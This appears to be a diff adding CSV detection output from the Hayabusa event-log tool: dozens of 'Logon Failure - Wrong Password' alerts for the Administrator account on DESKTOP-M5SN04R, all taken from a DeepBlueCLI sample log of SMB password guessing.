+2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
